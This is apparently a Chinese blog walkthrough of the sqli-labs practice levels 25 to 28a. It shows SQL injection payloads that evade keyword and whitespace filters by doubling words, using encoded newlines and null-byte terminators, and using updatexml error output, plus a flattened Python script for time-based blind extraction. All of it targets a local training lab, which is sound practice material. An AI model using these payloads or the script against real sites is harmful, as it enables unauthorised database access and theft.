一、环境

网上都有不过多阐述

二、sql-labs第25关

它说你的OR和and属于它,那就是过滤了OR和and

注入尝试

不用or和and进行爆破注入,很明显是有注入点的

?id=-1' union select 1,2,3--+

 

查看数据库

 ok，此道题算是解了但是如果我们用了and了呢

?id=-1' and updatexml(1,1,1)--+

很明显报错

绕过方法双写and

?id=-1' aandnd updatexml(1,concat(0x7e,user(),0x7e),1)--+

 

三、sql-labs第26关

看看界面没空格和注释符了

 试着看看怎么报错

替换一下空格 /**/，很明显也被过滤掉了

mysql中有常见的空格%0a,%0c,%0d,好还是不行

 看看源码到底过滤了啥，都是替换形式过滤

那很明显and爆破注入是可以的，去试试,很明显确实是可以的

?id=1' aandnd

 注入语句,当然这个注释也可以and一个全真式绕过

?id=1' aandnd(updatexml(1,concat(0x7e,user(),0x7e),1));%00

四、sql-labs26a关

换了一个闭合方式和26一样的，单引号闭合多个括号

 但是报错被注释了，那我们只能盲注了

先测试一下很明显沉睡了三秒

http://127.0.0.1/sqllabs/Less-26a/?id=1%27)%20aandnd(if%20ascii(left(database(),1))%3E100,sleep(3),0));%00

 

行了，上脚本吧

import requests
import time
def inject_database(url):name = ''for i in range(1, 20):low = 32high = 128mid = (low + high) // 2while low < high:payload = "1')aandnd(if(ascii(substr(database(),%d,1))>%d, sleep(2), 0)aandnd('1')=('1" % (i,mid)) params = {"id":payload}start_time = time.time()r = requests.get(url, params=params)end_time = time.time()if end_time - start_time >= 1:low = mid + 1else:high = midmid = (low + high) // 2if mid == 32:breakname += chr(mid)print(name)if __name__ == "__main__":url = 'http://127.0.0.1/sqli/Less-26a/index.php'inject_database(url)

五、第27关

看一看27的过滤

 尝试一下双写

http://127.0.0.1/sqli/Less-27/?id=-1%27%0auunionnion

ok绕过了 

开始查询

http://127.0.0.1/sqli/Less-27/?id=100%27%0auunionnion%0aSelEct%0a1,2,3;%00

 

好了很明显注入点在2,3操作就行了 

爆破注入也可以

http://127.0.0.1/sqli/Less-27/?id=1%27%0aand%0aupdatexml(1,concat(0x7e,user(),0x7e),1);%00

六、第27a关

闭合方式变成"号了跟27一模一样

七、第28关

?id=1%27)%0aunion%0aselect

 被限制了

有个/i修饰符无视大小写了，如何绕过？双写即可

http://127.0.0.1/sqli/Less-28/?id=1%27)%0aunion%0aunion%0aselectselect

 

最终

http://127.0.0.1/sqli/Less-28/?id=100%27)%0aunion%0aunion%0aselectselect%0a1,2,3;%00

 

八、28a

跟28一样的，而且限制变少了，没空格等限制了